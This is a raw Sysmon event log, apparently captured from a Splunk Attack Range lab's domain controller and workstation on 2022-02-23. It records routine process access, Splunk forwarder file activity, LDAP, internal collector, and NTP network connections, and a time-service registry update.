11:20:03.716{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:03.716{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:03.716{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1863-6216-4707-000000003802}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:03.716{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1863-6216-4707-000000003802}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:03.718{C8EA50B7-1863-6216-4707-000000003802}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:04.946{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76AC24A4D58F3430BE4141C25BC1C388,SHA256=64EAF9D6A8EB9B5591F9C7FF72CD8291DB28133669D1AE187F53F8C0443554AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221978Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:04.369{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFD125477E78281FAE03B2A277BF7F28,SHA256=24D91D61236198F6CCDDA896355D9170F6552DC4591E59D7A1032564DD3DB8B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:05.946{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=755F14FE9F9EDCC247F29EA1FE7EEE63,SHA256=F8B1133B7FC023D9B10EDA3DFB3F0A47A85C6090E7BCCE55F0F6BFE79CF6FAAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221979Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:05.447{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00FADC3154DE6C41B6B1BEB12F112059,SHA256=67E52C5E62B07EBEE5ADE4CDC0AF66158824B26C80924C973FB48066A176E04E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:03.508{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49505-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000298105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:03.508{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49505-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000298109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:06.953{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3DA280EA44586402C847CE0F25CA270,SHA256=5C733EA16191DD743DE402236BF2B906C92DCE882E8E301C4DA86D77A8DF911B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221980Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:06.603{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EDC9EA6561B36BD41CF11AD370C1E26,SHA256=367B942C90D2879D2CD2A85835171EE17D82C3823C9E943DF44801B86BA68F6B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:04.535{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49506-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:07.968{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC533F121383ECAE850D5AB13915254C,SHA256=3DB0DD653C9A5459784223E3D5710D54450C312971ABD836780B24544E417F26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221982Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:07.650{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84EB5DA3A2FFF27E779049B2C5F34811,SHA256=725F5E927EBE372DD0CA550FFCAF99CB4C33469865D07AD0AF0D89BBC94A1327,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221981Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:05.652{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51686-false10.0.1.12-8000- 23542300x8000000000000000298111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:08.983{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E4F388D79678922CC38A0FA56476734,SHA256=80ADC333C9FB22B997AA04EAF4E390B6D792B912EE7836F4CFFF2696D7CE6494,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221983Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:08.790{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=155975A889788B56F2B09CA5CD82C604,SHA256=33132BA33CB23146E4A27B7B69025BAD40B70703263638B08D3A6EE622DBE723,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:09.983{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20917F4B8368ED4913CF7AD9B1E511C5,SHA256=04BC50BC384CE6975E6ED7FECF662D18B8DFF2A104AF30ACBD73B06034F3FAD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221984Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:09.884{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E106C18188999921F1D7457F21630B3C,SHA256=8EFE16057E094F0BF9F25154CBECC028126D8C1F9228345871ED44BEB7A55423,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221985Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:10.900{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B70F67CACE8E2DBC3FBAD26783392ECD,SHA256=67ACFB2D70946358AAE974EED0B3D7E02D88754AB4CB504B6BF893E17E4DB2E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:10.983{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6557035559BC0F79EADA6CA76C4E04A5,SHA256=3660656B065C2045C6F2350C94A1CECDA0AC81D442EF4C2E7EFC84D71EA57486,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:09.588{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49507-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000221986Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:12.119{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFD298BED948A802EA6CAE64AB7F6530,SHA256=70D7D7B9684AC268B84319C83DEBC86D2240480FD9BD8951598FD7146F029C8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:12.000{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89E6C4911231212C1CCBF41FF564B773,SHA256=B43A8DFC2E654094F1ECF4A776DBEAB3BCF7BBED6434A4AB8CF3B65666BAA31E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221988Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:11.603{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51687-false10.0.1.12-8000- 23542300x8000000000000000221987Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:13.353{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2F1B0C3B9874378AAB65D31A45E5149,SHA256=E9744A301F6E3DC859E36CF484461BC6E22464C9271858B4A28301FCC1ABBD3B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000298117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:20:13.468{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d828a7-0x539a17e3) 23542300x8000000000000000298116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:13.015{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F13853F91536C7487312839B3A3F47C,SHA256=60825342C0B2E1C34415565BC05C18B68FD100A150844FFB27522B6A7A1B6A94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221989Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:14.447{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9189335460FB2920D70556594F5FEB81,SHA256=6E4864121AF63392659BF657744BEEDC50AC10998C3A5861DF5FB13FEA2F3F5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:14.020{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=706229CA06CF7C03FD319C5364106DEB,SHA256=70E21849C4A545FF1313CBED6ADEB961B77FDC20CA1B174FC923A41EE80B2063,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221990Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:15.509{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71B8036BBAF715F0E42663D9C9912A57,SHA256=6A7C4E276EF4189234D978703CBD94FCD80C891ED8E98799C3A6BB98A9CC334F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:15.043{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB5ED24A9BEE208660B0CBA523AD46CA,SHA256=EA7E6D4A6E3098DB82EC3B4B610D17EF04FFE8122DB29FDA1E8C5E2798C71711,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:12.925{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local123ntpfalse20.101.57.9-123ntp 23542300x8000000000000000221991Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:16.525{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=272737173EC88D8CFCADF5A11BB15352,SHA256=863B1E661716BF62792E0A4F003321F9C64F7E154DC451B30A248D5E20BACB77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:16.059{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99108502284059DB04F60182BD427B29,SHA256=496F922537620DEE7663F37C5518830A6EDDF16DE91745A122FDCD4555B31B30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221992Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:17.759{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=466DFABCA0CAE7ECB4E216AFEDB8DF6E,SHA256=95CB8FA554B2B5FA26B416A70523E3D791AA2967AE1B9A177C68A898FDE497F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:14.657{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49508-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:17.074{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B7D2C44B3EB9B7CED339AD750B45141,SHA256=8631E9640FBD6AE872251699D5D505720FE3AB8B2B350D299B18A078AC1152B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221993Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:18.993{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=800DB41DE90958D93675655B9B69BB30,SHA256=C6D03A2723E43415860E2FBB27900D42AC7A4D0667E95E9DD4BC27E1BA77B2A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:18.089{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CA38F23E4CCCD7D914A3D188BE449CF,SHA256=2CF76CE2D039910FCE843C7DB457419AF61F42839EFC8D0CF6C8933272327882,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.802{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1873-6216-4907-000000003802}6704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.802{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.802{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 